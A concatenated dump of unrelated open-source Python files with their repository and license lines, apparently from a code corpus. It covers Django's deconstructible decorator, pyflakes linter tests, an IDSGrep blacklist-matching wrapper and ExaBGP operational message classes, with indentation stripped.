def deconstructible(*args, **kwargs):
"""
Class decorator that allow the decorated class to be serialized
by the migrations subsystem.
Accepts an optional kwarg `path` to specify the import path.
"""
path = kwargs.pop('path', None)
def decorator(klass):
def __new__(cls, *args, **kwargs):
# We capture the arguments to make returning them trivial
obj = super(klass, cls).__new__(cls)
obj._constructor_args = (args, kwargs)
return obj
def deconstruct(obj):
"""
Returns a 3-tuple of class import path, positional arguments,
and keyword arguments.
"""
# Python 2/fallback version
if path:
module_name, _, name = path.rpartition('.')
else:
module_name = obj.__module__
name = obj.__class__.__name__
# Make sure it's actually there and not an inner class
module = import_module(module_name)
if not hasattr(module, name):
raise ValueError(
"Could not find object %s in %s.\n"
"Please note that you cannot serialize things like inner "
"classes. Please move the object into the main module "
"body to use migrations.\n"
"For more information, see "
"https://docs.djangoproject.com/en/%s/topics/migrations/#serializing-values"
% (name, module_name, get_docs_version()))
return (
path or '%s.%s' % (obj.__class__.__module__, name),
obj._constructor_args[0],
obj._constructor_args[1],
)
klass.__new__ = staticmethod(__new__)
klass.deconstruct = deconstruct
return klass
if not args:
return decorator
return decorator(*args, **kwargs)
| bsd-3-clause |
microelly2/cadquery-freecad-module | CadQuery/Libs/pyflakes/test/test_other.py | 6 | 25072 | """
Tests for various Pyflakes behavior.
"""
from sys import version_info
from pyflakes import messages as m
from pyflakes.test.harness import TestCase, skip, skipIf
class Test(TestCase):
def test_duplicateArgs(self):
self.flakes('def fu(bar, bar): pass', m.DuplicateArgument)
def test_localReferencedBeforeAssignment(self):
self.flakes('''
a = 1
def f():
a; a=1
f()
''', m.UndefinedLocal, m.UnusedVariable)
def test_redefinedInListComp(self):
"""
Test that shadowing a variable in a list comprehension raises
a warning.
"""
self.flakes('''
a = 1
[1 for a, b in [(1, 2)]]
''', m.RedefinedInListComp)
self.flakes('''
class A:
a = 1
[1 for a, b in [(1, 2)]]
''', m.RedefinedInListComp)
self.flakes('''
def f():
a = 1
[1 for a, b in [(1, 2)]]
''', m.RedefinedInListComp)
self.flakes('''
[1 for a, b in [(1, 2)]]
[1 for a, b in [(1, 2)]]
''')
self.flakes('''
for a, b in [(1, 2)]:
pass
[1 for a, b in [(1, 2)]]
''')
def test_redefinedInGenerator(self):
"""
Test that reusing a variable in a generator does not raise
a warning.
"""
self.flakes('''
a = 1
(1 for a, b in [(1, 2)])
''')
self.flakes('''
class A:
a = 1
list(1 for a, b in [(1, 2)])
''')
self.flakes('''
def f():
a = 1
(1 for a, b in [(1, 2)])
''', m.UnusedVariable)
self.flakes('''
(1 for a, b in [(1, 2)])
(1 for a, b in [(1, 2)])
''')
self.flakes('''
for a, b in [(1, 2)]:
pass
(1 for a, b in [(1, 2)])
''')
@skipIf(version_info < (2, 7), "Python >= 2.7 only")
def test_redefinedInSetComprehension(self):
"""
Test that reusing a variable in a set comprehension does not raise
a warning.
"""
self.flakes('''
a = 1
{1 for a, b in [(1, 2)]}
''')
self.flakes('''
class A:
a = 1
{1 for a, b in [(1, 2)]}
''')
self.flakes('''
def f():
a = 1
{1 for a, b in [(1, 2)]}
''', m.UnusedVariable)
self.flakes('''
{1 for a, b in [(1, 2)]}
{1 for a, b in [(1, 2)]}
''')
self.flakes('''
for a, b in [(1, 2)]:
pass
{1 for a, b in [(1, 2)]}
''')
@skipIf(version_info < (2, 7), "Python >= 2.7 only")
def test_redefinedInDictComprehension(self):
"""
Test that reusing a variable in a dict comprehension does not raise
a warning.
"""
self.flakes('''
a = 1
{1: 42 for a, b in [(1, 2)]}
''')
self.flakes('''
class A:
a = 1
{1: 42 for a, b in [(1, 2)]}
''')
self.flakes('''
def f():
a = 1
{1: 42 for a, b in [(1, 2)]}
''', m.UnusedVariable)
self.flakes('''
{1: 42 for a, b in [(1, 2)]}
{1: 42 for a, b in [(1, 2)]}
''')
self.flakes('''
for a, b in [(1, 2)]:
pass
{1: 42 for a, b in [(1, 2)]}
''')
def test_redefinedFunction(self):
"""
Test that shadowing a function definition with another one raises a
warning.
"""
self.flakes('''
def a(): pass
def a(): pass
''', m.RedefinedWhileUnused)
def test_redefinedClassFunction(self):
"""
Test that shadowing a function definition in a class suite with another
one raises a warning.
"""
self.flakes('''
class A:
def a(): pass
def a(): pass
''', m.RedefinedWhileUnused)
def test_redefinedIfElseFunction(self):
"""
Test that shadowing a function definition twice in an if
and else block does not raise a warning.
"""
self.flakes('''
if True:
def a(): pass
else:
def a(): pass
''')
def test_redefinedIfFunction(self):
"""
Test that shadowing a function definition within an if block
raises a warning.
"""
self.flakes('''
if True:
def a(): pass
def a(): pass
''', m.RedefinedWhileUnused)
def test_redefinedTryExceptFunction(self):
"""
Test that shadowing a function definition twice in try
and except block does not raise a warning.
"""
self.flakes('''
try:
def a(): pass
except:
def a(): pass
''')
def test_redefinedTryFunction(self):
"""
Test that shadowing a function definition within a try block
raises a warning.
"""
self.flakes('''
try:
def a(): pass
def a(): pass
except:
pass
''', m.RedefinedWhileUnused)
def test_redefinedIfElseInListComp(self):
"""
Test that shadowing a variable in a list comprehension in
an if and else block does not raise a warning.
"""
self.flakes('''
if False:
a = 1
else:
[a for a in '12']
''')
def test_redefinedElseInListComp(self):
"""
Test that shadowing a variable in a list comprehension in
an else (or if) block raises a warning.
"""
self.flakes('''
if False:
pass
else:
a = 1
[a for a in '12']
''', m.RedefinedInListComp)
def test_functionDecorator(self):
"""
Test that shadowing a function definition with a decorated version of
that function does not raise a warning.
"""
self.flakes('''
from somewhere import somedecorator
def a(): pass
a = somedecorator(a)
''')
def test_classFunctionDecorator(self):
"""
Test that shadowing a function definition in a class suite with a
decorated version of that function does not raise a warning.
"""
self.flakes('''
class A:
def a(): pass
a = classmethod(a)
''')
@skipIf(version_info < (2, 6), "Python >= 2.6 only")
def test_modernProperty(self):
self.flakes("""
class A:
@property
def t(self):
pass
@t.setter
def t(self, value):
pass
@t.deleter
def t(self):
pass
""")
def test_unaryPlus(self):
"""Don't die on unary +."""
self.flakes('+1')
def test_undefinedBaseClass(self):
"""
If a name in the base list of a class definition is undefined, a
warning is emitted.
"""
self.flakes('''
class foo(foo):
pass
''', m.UndefinedName)
def test_classNameUndefinedInClassBody(self):
"""
If a class name is used in the body of that class's definition and
the name is not already defined, a warning is emitted.
"""
self.flakes('''
class foo:
foo
''', m.UndefinedName)
def test_classNameDefinedPreviously(self):
"""
If a class name is used in the body of that class's definition and
the name was previously defined in some other way, no warning is
emitted.
"""
self.flakes('''
foo = None
class foo:
foo
''')
def test_classRedefinition(self):
"""
If a class is defined twice in the same module, a warning is emitted.
"""
self.flakes('''
class Foo:
pass
class Foo:
pass
''', m.RedefinedWhileUnused)
def test_functionRedefinedAsClass(self):
"""
If a function is redefined as a class, a warning is emitted.
"""
self.flakes('''
def Foo():
pass
class Foo:
pass
''', m.RedefinedWhileUnused)
def test_classRedefinedAsFunction(self):
"""
If a class is redefined as a function, a warning is emitted.
"""
self.flakes('''
class Foo:
pass
def Foo():
pass
''', m.RedefinedWhileUnused)
@skip("todo: Too hard to make this warn but other cases stay silent")
def test_doubleAssignment(self):
"""
If a variable is re-assigned to without being used, no warning is
emitted.
"""
self.flakes('''
x = 10
x = 20
''', m.RedefinedWhileUnused)
def test_doubleAssignmentConditionally(self):
"""
If a variable is re-assigned within a conditional, no warning is
emitted.
"""
self.flakes('''
x = 10
if True:
x = 20
''')
def test_doubleAssignmentWithUse(self):
"""
If a variable is re-assigned to after being used, no warning is
emitted.
"""
self.flakes('''
x = 10
y = x * 2
x = 20
''')
def test_comparison(self):
"""
If a defined name is used on either side of any of the six comparison
operators, no warning is emitted.
"""
self.flakes('''
x = 10
y = 20
x < y
x <= y
x == y
x != y
x >= y
x > y
''')
def test_identity(self):
"""
If a defined name is used on either side of an identity test, no
warning is emitted.
"""
self.flakes('''
x = 10
y = 20
x is y
x is not y
''')
def test_containment(self):
"""
If a defined name is used on either side of a containment test, no
warning is emitted.
"""
self.flakes('''
x = 10
y = 20
x in y
x not in y
''')
def test_loopControl(self):
"""
break and continue statements are supported.
"""
self.flakes('''
for x in [1, 2]:
break
''')
self.flakes('''
for x in [1, 2]:
continue
''')
def test_ellipsis(self):
"""
Ellipsis in a slice is supported.
"""
self.flakes('''
[1, 2][...]
''')
def test_extendedSlice(self):
"""
Extended slices are supported.
"""
self.flakes('''
x = 3
[1, 2][x,:]
''')
def test_varAugmentedAssignment(self):
"""
Augmented assignment of a variable is supported.
We don't care about var refs.
"""
self.flakes('''
foo = 0
foo += 1
''')
def test_attrAugmentedAssignment(self):
"""
Augmented assignment of attributes is supported.
We don't care about attr refs.
"""
self.flakes('''
foo = None
foo.bar += foo.baz
''')
class TestUnusedAssignment(TestCase):
"""
Tests for warning about unused assignments.
"""
def test_unusedVariable(self):
"""
Warn when a variable in a function is assigned a value that's never
used.
"""
self.flakes('''
def a():
b = 1
''', m.UnusedVariable)
def test_unusedVariableAsLocals(self):
"""
Using locals() it is perfectly valid to have unused variables
"""
self.flakes('''
def a():
b = 1
return locals()
''')
def test_unusedVariableNoLocals(self):
"""
Using locals() in wrong scope should not matter
"""
self.flakes('''
def a():
locals()
def a():
b = 1
return
''', m.UnusedVariable)
def test_assignToGlobal(self):
"""
Assigning to a global and then not using that global is perfectly
acceptable. Do not mistake it for an unused local variable.
"""
self.flakes('''
b = 0
def a():
global b
b = 1
''')
@skipIf(version_info < (3,), 'new in Python 3')
def test_assignToNonlocal(self):
"""
Assigning to a nonlocal and then not using that binding is perfectly
acceptable. Do not mistake it for an unused local variable.
"""
self.flakes('''
b = b'0'
def a():
nonlocal b
b = b'1'
''')
def test_assignToMember(self):
"""
Assigning to a member of another object and then not using that member
variable is perfectly acceptable. Do not mistake it for an unused
local variable.
"""
# XXX: Adding this test didn't generate a failure. Maybe not
# necessary?
self.flakes('''
class b:
pass
def a():
b.foo = 1
''')
def test_assignInForLoop(self):
"""
Don't warn when a variable in a for loop is assigned to but not used.
"""
self.flakes('''
def f():
for i in range(10):
pass
''')
def test_assignInListComprehension(self):
"""
Don't warn when a variable in a list comprehension is
assigned to but not used.
"""
self.flakes('''
def f():
[None for i in range(10)]
''')
def test_generatorExpression(self):
"""
Don't warn when a variable in a generator expression is
assigned to but not used.
"""
self.flakes('''
def f():
(None for i in range(10))
''')
def test_assignmentInsideLoop(self):
"""
Don't warn when a variable assignment occurs lexically after its use.
"""
self.flakes('''
def f():
x = None
for i in range(10):
if i > 2:
return x
x = i * 2
''')
def test_tupleUnpacking(self):
"""
Don't warn when a variable included in tuple unpacking is unused. It's
very common for variables in a tuple unpacking assignment to be unused
in good Python code, so warning will only create false positives.
"""
self.flakes('''
def f(tup):
(x, y) = tup
''')
self.flakes('''
def f():
(x, y) = 1, 2
''', m.UnusedVariable, m.UnusedVariable)
self.flakes('''
def f():
(x, y) = coords = 1, 2
if x > 1:
print(coords)
''')
self.flakes('''
def f():
(x, y) = coords = 1, 2
''', m.UnusedVariable)
self.flakes('''
def f():
coords = (x, y) = 1, 2
''', m.UnusedVariable)
def test_listUnpacking(self):
"""
Don't warn when a variable included in list unpacking is unused.
"""
self.flakes('''
def f(tup):
[x, y] = tup
''')
self.flakes('''
def f():
[x, y] = [1, 2]
''', m.UnusedVariable, m.UnusedVariable)
def test_closedOver(self):
"""
Don't warn when the assignment is used in an inner function.
"""
self.flakes('''
def barMaker():
foo = 5
def bar():
return foo
return bar
''')
def test_doubleClosedOver(self):
"""
Don't warn when the assignment is used in an inner function, even if
that inner function itself is in an inner function.
"""
self.flakes('''
def barMaker():
foo = 5
def bar():
def baz():
return foo
return bar
''')
def test_tracebackhideSpecialVariable(self):
"""
Do not warn about unused local variable __tracebackhide__, which is
a special variable for py.test.
"""
self.flakes("""
def helper():
__tracebackhide__ = True
""")
def test_ifexp(self):
"""
Test C{foo if bar else baz} statements.
"""
self.flakes("a = 'moo' if True else 'oink'")
self.flakes("a = foo if True else 'oink'", m.UndefinedName)
self.flakes("a = 'moo' if True else bar", m.UndefinedName)
def test_withStatementNoNames(self):
"""
No warnings are emitted for using inside or after a nameless C{with}
statement a name defined beforehand.
"""
self.flakes('''
from __future__ import with_statement
bar = None
with open("foo"):
bar
bar
''')
def test_withStatementSingleName(self):
"""
No warnings are emitted for using a name defined by a C{with} statement
within the suite or afterwards.
"""
self.flakes('''
from __future__ import with_statement
with open('foo') as bar:
bar
bar
''')
def test_withStatementAttributeName(self):
"""
No warnings are emitted for using an attribute as the target of a
C{with} statement.
"""
self.flakes('''
from __future__ import with_statement
import foo
with open('foo') as foo.bar:
pass
''')
def test_withStatementSubscript(self):
"""
No warnings are emitted for using a subscript as the target of a
C{with} statement.
"""
self.flakes('''
from __future__ import with_statement
import foo
with open('foo') as foo[0]:
pass
''')
def test_withStatementSubscriptUndefined(self):
"""
An undefined name warning is emitted if the subscript used as the
target of a C{with} statement is not defined.
"""
self.flakes('''
from __future__ import with_statement
import foo
with open('foo') as foo[bar]:
pass
''', m.UndefinedName)
def test_withStatementTupleNames(self):
"""
No warnings are emitted for using any of the tuple of names defined by
a C{with} statement within the suite or afterwards.
"""
self.flakes('''
from __future__ import with_statement
with open('foo') as (bar, baz):
bar, baz
bar, baz
''')
def test_withStatementListNames(self):
"""
No warnings are emitted for using any of the list of names defined by a
C{with} statement within the suite or afterwards.
"""
self.flakes('''
from __future__ import with_statement
with open('foo') as [bar, baz]:
bar, baz
bar, baz
''')
def test_withStatementComplicatedTarget(self):
"""
If the target of a C{with} statement uses any or all of the valid forms
for that part of the grammar (See
U{http://docs.python.org/reference/compound_stmts.html#the-with-statement}),
the names involved are checked both for definedness and any bindings
created are respected in the suite of the statement and afterwards.
"""
self.flakes('''
from __future__ import with_statement
c = d = e = g = h = i = None
with open('foo') as [(a, b), c[d], e.f, g[h:i]]:
a, b, c, d, e, g, h, i
a, b, c, d, e, g, h, i
''')
def test_withStatementSingleNameUndefined(self):
"""
An undefined name warning is emitted if the name first defined by a
C{with} statement is used before the C{with} statement.
"""
self.flakes('''
from __future__ import with_statement
bar
with open('foo') as bar:
pass
''', m.UndefinedName)
def test_withStatementTupleNamesUndefined(self):
"""
An undefined name warning is emitted if a name first defined by a the
tuple-unpacking form of the C{with} statement is used before the
C{with} statement.
"""
self.flakes('''
from __future__ import with_statement
baz
with open('foo') as (bar, baz):
pass
''', m.UndefinedName)
def test_withStatementSingleNameRedefined(self):
"""
A redefined name warning is emitted if a name bound by an import is
rebound by the name defined by a C{with} statement.
"""
self.flakes('''
from __future__ import with_statement
import bar
with open('foo') as bar:
pass
''', m.RedefinedWhileUnused)
def test_withStatementTupleNamesRedefined(self):
"""
A redefined name warning is emitted if a name bound by an import is
rebound by one of the names defined by the tuple-unpacking form of a
C{with} statement.
"""
self.flakes('''
from __future__ import with_statement
import bar
with open('foo') as (bar, baz):
pass
''', m.RedefinedWhileUnused)
def test_withStatementUndefinedInside(self):
"""
An undefined name warning is emitted if a name is used inside the
body of a C{with} statement without first being bound.
"""
self.flakes('''
from __future__ import with_statement
with open('foo') as bar:
baz
''', m.UndefinedName)
def test_withStatementNameDefinedInBody(self):
"""
A name defined in the body of a C{with} statement can be used after
the body ends without warning.
"""
self.flakes('''
from __future__ import with_statement
with open('foo') as bar:
baz = 10
baz
''')
def test_withStatementUndefinedInExpression(self):
"""
An undefined name warning is emitted if a name in the I{test}
expression of a C{with} statement is undefined.
"""
self.flakes('''
from __future__ import with_statement
with bar as baz:
pass
''', m.UndefinedName)
self.flakes('''
from __future__ import with_statement
with bar as bar:
pass
''', m.UndefinedName)
@skipIf(version_info < (2, 7), "Python >= 2.7 only")
def test_dictComprehension(self):
"""
Dict comprehensions are properly handled.
"""
self.flakes('''
a = {1: x for x in range(10)}
''')
@skipIf(version_info < (2, 7), "Python >= 2.7 only")
def test_setComprehensionAndLiteral(self):
"""
Set comprehensions are properly handled.
"""
self.flakes('''
a = {1, 2, 3}
b = {x for x in range(10)}
''')
def test_exceptionUsedInExcept(self):
as_exc = ', ' if version_info < (2, 6) else ' as '
self.flakes('''
try: pass
except Exception%se: e
''' % as_exc)
self.flakes('''
def download_review():
try: pass
except Exception%se: e
''' % as_exc)
def test_exceptWithoutNameInFunction(self):
"""
Don't issue false warning when an unnamed exception is used.
Previously, there would be a false warning, but only when the
try..except was in a function
"""
self.flakes('''
import tokenize
def foo():
try: pass
except tokenize.TokenError: pass
''')
def test_exceptWithoutNameInFunctionTuple(self):
"""
Don't issue false warning when an unnamed exception is used.
This example catches a tuple of exception types.
"""
self.flakes('''
import tokenize
def foo():
try: pass
except (tokenize.TokenError, IndentationError): pass
''')
def test_augmentedAssignmentImportedFunctionCall(self):
"""
Consider a function that is called on the right part of an
augassign operation to be used.
"""
self.flakes('''
from foo import bar
baz = 0
baz += bar()
''')
@skipIf(version_info < (3, 3), 'new in Python 3.3')
def test_yieldFromUndefined(self):
"""
Test C{yield from} statement
"""
self.flakes('''
def bar():
yield from foo()
''', m.UndefinedName)
| lgpl-3.0 |
ogrodas/idsgrep | idsgrep/idsgrep.py | 1 | 6985 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""IDSGrep is a GNU Grep wrapper that understands IPv4-addresses, IPv4CIDRs, IPv4-Ranges and Domains
"""
import logging
logging.basicConfig(format="%(asctime)s - %(levelname)8s - %(message)s")
import sys
import datetime
import csv
import ConfigParser
import argparse
import matchingengine
import signatureset
import alarm
USAGE=\
"""
idsgrep [OPTIONS] PATTERN [FILE...]
idsgrep [OPTIONS] [--black-db HOST | --black-file FILE] [FILE...]
"""
def main():
try:
args=parse_args()
setup_logging(args)
TibIDS(args)
except KeyboardInterrupt,e:
sys.stderr.write("User presdd Ctrl+C. Exiting..\n")
except IOError as (errno, strerror):
if errno==32 and strerror=="Broken pipe":
sys.stderr.write("Broken pipe. Exiting..\n")
else:
logging.exception(strerror)
except Exception,e:
logging.exception(str(e))
def parse_args(argv=None):
if argv is None:
argv = sys.argv
# Parse any conf_file specification
# We make this parser with add_help=False so that
# it doesn't parse -h and print help.
conf_parser = argparse.ArgumentParser(
# Don't mess with format of description
formatter_class=argparse.RawDescriptionHelpFormatter,
# Turn off help, so we print all options in response to -h
add_help=False
)
conf_parser.add_argument("-c", "--conf_file",
help="Specify config file", metavar="FILE")
args, remaining_argv = conf_parser.parse_known_args()
if args.conf_file:
config = ConfigParser.SafeConfigParser()
config.read([args.conf_file])
print args.conf_file
defaults = dict(config.items("Defaults"))
else:
defaults = { }
# Parse rest of arguments
# Don't suppress add_help here so it will handle -h
parser = argparse.ArgumentParser(
# Inherit options from config_parser
description=__doc__, # printed with -h/--help
usage=USAGE,
parents=[conf_parser]
)
parser.set_defaults(**defaults)
parser.add_argument ('--black-db',metavar="HOST", default=None,help='Blacklist MongoDB database')
parser.add_argument ('--asset-db',metavar="HOST",default=None,help='Assetlist MongoDB database')
parser.add_argument ('-b','--black-file',metavar="FILE",default="",help='Blacklist file')
parser.add_argument ('-a','--asset-file',metavar="FILE",default="",help='Assetlist file')
parser.add_argument ('-s','--save-to-mongodb',default=False, action="store_true", help='Store alarms in mongoDB')
parser.add_argument ('-q','--quiet',default=False, action="store_true", help='')
parser.add_argument ('--min-fx',metavar="NUM",default=5, help='')
parser.add_argument ('--no-color',default=False, action="store_true", help='')
parser.add_argument ('--splunk',default=False, action="store_true", help='')
parser.add_argument ('--tmpdir',metavar="DIR",default="/tmp/", help='Folder for temporary files')
parser.add_argument ('--logfile',metavar="FILE",default="", help='Logfile')
parser.add_argument('-v', nargs='?', action=VAction, dest='verbose',default=2)
parser.add_argument ('files', nargs="*",default=None, help='')
return parser.parse_args(remaining_argv)
def setup_logging(args):
log_mapping={
0:50, #Disable logging
1:logging.ERROR,
2:logging.WARNING,
3:logging.INFO,
4:logging.DEBUG
}
logging.root.setLevel(log_mapping[args.verbose])
try:
if args.logfile:
fh = logging.FileHandler(args.logfile)
fh.setLevel(logging.DEBUG)
fh_formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
fh.setFormatter(console_formatter)
logging.getLogger('').addHandler(fh)
except IOError,e:
logging.warning("Can't write log to logfile %s", args.logfile)
pass #No logging to file
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values==None:
values='1'
try:
values=int(values)
except ValueError:
values=values.count('v')+1
setattr(args, self.dest, values)
class TibIDS(object):
def __init__(self,args):
self.args=args
if args.black_file:
self.black=signatureset.SignatureSetFile(self.args.black_file)
elif args.black_db:
self.black=signatureset.SignatureSetMongoDb(self.args.black_db,"sigdb","black")
else:
if args.files:
strsig=self.args.files.pop(0)
self.black=signatureset.SignatureSetText(strsig)
else:
print "Missing signatures."
print "Try `idsgrep --help' for more information."
sys.exit(1)
if self.args.asset_file:
self.asset=signatureset.SignatureSetFile(self.args.asset_file)
elif self.args.asset_db:
self.asset=signatureset.SignatureSetMongoDb(self.args.asset_db,"sigdb","asset")
else:
self.asset=None
self.black_search=matchingengine.FGrepMatchingEngine(self.black,min_fx=int(self.args.min_fx))
if self.asset:
self.asset_search=matchingengine.MatchingEngine(self.asset)
if self.args.splunk:
self.start_splunk()
else:
self.start()
def search(self):
for matches in self.black_search.findall_files(self.args.files):
victim=self.find_victim(matches[0].data)
yield alarm.Alarm(matches,victim)
def find_victim(self,data):
#TODO find the most important victim, not the first
if not self.asset:
return None
victims=self.asset_search.findall(data)
for v in victims:
return v.data[v.start:v.stop]
def start_splunk(self):
fieldnames=csv.DictReader(sys.stdin).fieldnames
fieldnames.append("sig")
fieldnames.append("score")
fieldnames.append("victim")
print ",".join(fieldnames)
for alarm in self.search():
for match in alarm.matches:
print alarm.data + "," + ",".join([match.sig["sig"],str(match.sig["score"]),alarm.victim])
def start(self):
for alarm in self.search():
if not self.args.quiet:
if self.args.no_color:
print alarm.data
else:
print alarm.colors()
if self.args.save_to_mongodb:
alarm.save("alarms","alarms")
if __name__=="__main__":
main()
| gpl-3.0 |
lochiiconnectivity/exabgp | lib/exabgp/bgp/message/operational.py | 1 | 9147 | # encoding: utf-8
"""
operational/__init__.py
Created by Thomas Mangin on 2013-09-01.
Copyright (c) 2009-2015 Exa Networks. All rights reserved.
"""
from struct import pack
from struct import unpack
from exabgp.protocol.family import AFI
from exabgp.protocol.family import SAFI
from exabgp.bgp.message.open.routerid import RouterID
from exabgp.bgp.message import Message
# ========================================================================= Type
#
MAX_ADVISORY = 2048 # 2K
class Type (int):
def pack (self):
return pack('!H',self)
def extract (self):
return [pack('!H',self)]
def __len__ (self):
return 2
def __str__ (self):
pass
# ================================================================== Operational
#
class Operational (Message):
ID = Message.ID.OPERATIONAL
TYPE = chr(Message.ID.OPERATIONAL)
registered_operational = dict()
has_family = False
has_routerid = False
is_fault = False
class ID (object):
__slots__ = []
# ADVISE
ADM = 0x01 # 01: Advisory Demand Message
ASM = 0x02 # 02: Advisory Static Message
# STATE
RPCQ = 0x03 # 03: Reachable Prefix Count Request
RPCP = 0x04 # 04: Reachable Prefix Count Reply
APCQ = 0x05 # 05: Adj-Rib-Out Prefix Count Request
APCP = 0x06 # 06: Adj-Rib-Out Prefix Count Reply
LPCQ = 0x07 # 07: BGP Loc-Rib Prefix Count Request
LPCP = 0x08 # 08: BGP Loc-Rib Prefix Count Reply
SSQ = 0x09 # 09: Simple State Request
# DUMP
DUP = 0x0A # 10: Dropped Update Prefixes
MUP = 0x0B # 11: Malformed Update Prefixes
MUD = 0x0C # 12: Malformed Update Dump
SSP = 0x0D # 13: Simple State Response
# CONTROL
MP = 0xFFFE # 65534: Max Permitted
NS = 0xFFFF # 65535: Not Satisfied
def __init__ (self,what):
Message.__init__(self)
self.what = Type(what)
def _message (self,data):
return Message._message(self,"%s%s%s" % (
self.what.pack(),
pack('!H',len(data)),
data
))
def __str__ (self):
return self.extensive()
def extensive (self):
return 'operational %s' % self.name
@classmethod
def register_operational (cls):
cls.registered_operational[cls.code] = (cls.category,cls)
@classmethod
def unpack_message (cls,data,negotiated):
what = Type(unpack('!H',data[0:2])[0])
length = unpack('!H',data[2:4])[0]
decode,klass = cls.registered_operational.get(what,('unknown',None))
if decode == 'advisory':
afi = unpack('!H',data[4:6])[0]
safi = ord(data[6])
data = data[7:length+4]
return klass(afi,safi,data)
elif decode == 'query':
afi = unpack('!H',data[4:6])[0]
safi = ord(data[6])
routerid = RouterID.unpack(data[7:11])
sequence = unpack('!L',data[11:15])[0]
return klass(afi,safi,routerid,sequence)
elif decode == 'counter':
afi = unpack('!H',data[4:6])[0]
safi = ord(data[6])
routerid = RouterID.unpack(data[7:11])
sequence = unpack('!L',data[11:15])[0]
counter = unpack('!L',data[15:19])[0]
return klass(afi,safi,routerid,sequence,counter)
else:
print 'ignoring ATM this kind of message'
Operational.register_message()
# ============================================================ OperationalFamily
#
class OperationalFamily (Operational):
has_family = True
def __init__ (self,what,afi,safi,data=''):
Operational.__init__(self,what)
self.afi = AFI(afi)
self.safi = SAFI(safi)
self.data = data
def family (self):
return (self.afi,self.safi)
def _message (self,data):
return Operational._message(self,"%s%s%s" % (
self.afi.pack(),
self.safi.pack(),
data
))
def message (self,negotiated):
return self._message(self.data)
# =================================================== SequencedOperationalFamily
#
class SequencedOperationalFamily (OperationalFamily):
__sequence_number = {}
has_routerid = True
def __init__ (self,what,afi,safi,routerid,sequence,data=''):
OperationalFamily.__init__(self,what,afi,safi,data)
self.routerid = routerid if routerid else None
self.sequence = sequence if sequence else None
self._sequence = self.sequence
self._routerid = self.routerid
def message (self,negotiated):
self.sent_routerid = self.routerid if self.routerid else negotiated.sent_open.router_id
if self.sequence is None:
self.sent_sequence = (self.__sequence_number.setdefault(self.routerid,0) + 1) % 0xFFFFFFFF
self.__sequence_number[self.sent_routerid] = self.sent_sequence
else:
self.sent_sequence = self.sequence
return self._message("%s%s%s" % (
self.sent_routerid.pack(),pack('!L',self.sent_sequence),
self.data
))
# =========================================================================== NS
#
class NS:
MALFORMED = 0x01 # Request TLV Malformed
UNSUPPORTED = 0x02 # TLV Unsupported for this neighbor
MAXIMUM = 0x03 # Max query frequency exceeded
PROHIBITED = 0x04 # Administratively prohibited
BUSY = 0x05 # Busy
NOTFOUND = 0x06 # Not Found
class _NS (OperationalFamily):
is_fault = True
def __init__ (self,afi,safi,sequence):
OperationalFamily.__init__(
self,
Operational.ID.NS,
afi,safi,
'%s%s' % (sequence,self.ERROR_SUBCODE)
)
def extensive (self):
return 'operational NS %s %s/%s' % (self.name,self.afi,self.safi)
class Malformed (_NS):
name = 'NS malformed'
ERROR_SUBCODE = '\x00\x01' # pack('!H',MALFORMED)
class Unsupported (_NS):
name = 'NS unsupported'
ERROR_SUBCODE = '\x00\x02' # pack('!H',UNSUPPORTED)
class Maximum (_NS):
name = 'NS maximum'
ERROR_SUBCODE = '\x00\x03' # pack('!H',MAXIMUM)
class Prohibited (_NS):
name = 'NS prohibited'
ERROR_SUBCODE = '\x00\x04' # pack('!H',PROHIBITED)
class Busy (_NS):
name = 'NS busy'
ERROR_SUBCODE = '\x00\x05' # pack('!H',BUSY)
class NotFound (_NS):
name = 'NS notfound'
ERROR_SUBCODE = '\x00\x06' # pack('!H',NOTFOUND)
# ===================================================================== Advisory
#
class Advisory:
class _Advisory (OperationalFamily):
category = 'advisory'
def extensive (self):
return 'operational %s afi %s safi %s "%s"' % (self.name,self.afi,self.safi,self.data)
class ADM (_Advisory):
name = 'ADM'
code = Operational.ID.ADM
def __init__ (self,afi,safi,advisory,routerid=None):
utf8 = advisory.encode('utf-8')
if len(utf8) > MAX_ADVISORY:
utf8 = utf8[:MAX_ADVISORY-3] + '...'.encode('utf-8')
OperationalFamily.__init__(
self,Operational.ID.ADM,
afi,safi,
utf8
)
class ASM (_Advisory):
name = 'ASM'
code = Operational.ID.ASM
def __init__ (self,afi,safi,advisory,routerid=None):
utf8 = advisory.encode('utf-8')
if len(utf8) > MAX_ADVISORY:
utf8 = utf8[:MAX_ADVISORY-3] + '...'.encode('utf-8')
OperationalFamily.__init__(
self,Operational.ID.ASM,
afi,safi,
utf8
)
Advisory.ADM.register_operational()
Advisory.ASM.register_operational()
# a = Advisory.ADM(1,1,'string 1')
# print a.extensive()
# b = Advisory.ASM(1,1,'string 2')
# print b.extensive()
# ======================================================================== Query
#
class Query:
class _Query (SequencedOperationalFamily):
category = 'query'
def __init__ (self,afi,safi,routerid,sequence):
SequencedOperationalFamily.__init__(
self,self.code,
afi,safi,
routerid,sequence
)
def extensive (self):
if self._routerid and self._sequence:
return 'operational %s afi %s safi %s router-id %s sequence %d' % (
self.name,
self.afi,self.safi,
self._routerid,self._sequence,
)
return 'operational %s afi %s safi %s' % (self.name,self.afi,self.safi)
class RPCQ (_Query):
name = 'RPCQ'
code = Operational.ID.RPCQ
class APCQ (_Query):
name = 'APCQ'
code = Operational.ID.APCQ
class LPCQ (_Query):
name = 'LPCQ'
code = Operational.ID.LPCQ
Query.RPCQ.register_operational()
Query.APCQ.register_operational()
Query.LPCQ.register_operational()
# ===================================================================== Response
#
class Response:
class _Counter (SequencedOperationalFamily):
category = 'counter'
def __init__ (self,afi,safi,routerid,sequence,counter):
self.counter = counter
SequencedOperationalFamily.__init__(
self,self.code,
afi,safi,
routerid,sequence,
pack('!L',counter)
)
def extensive (self):
if self._routerid and self._sequence:
return 'operational %s afi %s safi %s router-id %s sequence %d counter %d' % (
self.name,
self.afi,self.safi,
self._routerid,self._sequence,
self.counter
)
return 'operational %s afi %s safi %s counter %d' % (self.name,self.afi,self.safi,self.counter)
class RPCP (_Counter):
name = 'RPCP'
code = Operational.ID.RPCP
class APCP (_Counter):
name = 'APCP'
code = Operational.ID.APCP
class LPCP (_Counter):
name = 'LPCP'
code = Operational.ID.LPCP
Response.RPCP.register_operational()
Response.APCP.register_operational()
Response.LPCP.register_operational()
# c = State.RPCQ(1,1,'82.219.0.1',10)
# print c.extensive()
